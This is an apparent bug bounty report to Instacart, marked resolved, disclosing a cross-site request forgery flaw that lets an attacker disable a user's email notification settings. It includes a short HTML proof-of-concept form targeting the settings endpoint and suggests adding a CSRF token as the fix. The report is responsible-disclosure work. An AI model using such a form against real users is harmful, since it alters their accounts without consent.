CSRF To change Email Notification Settings
I
Instacart
Submitted None
Actions:
Reported by
trad_zero_h
Vulnerability Details
Technical details and impact analysis
Hi i found CSRF To change Email Notification Settings
The Code Of the HTML Page ::
<html>
<body>
<form action="https://www.instacart.com/api/v2/email_settings/76/disable?resource_token=">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
For Fixing you Must add CSEF Token to the Request
i attached Video Showing the Bug
Thanks
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-Site Request Forgery (CSRF)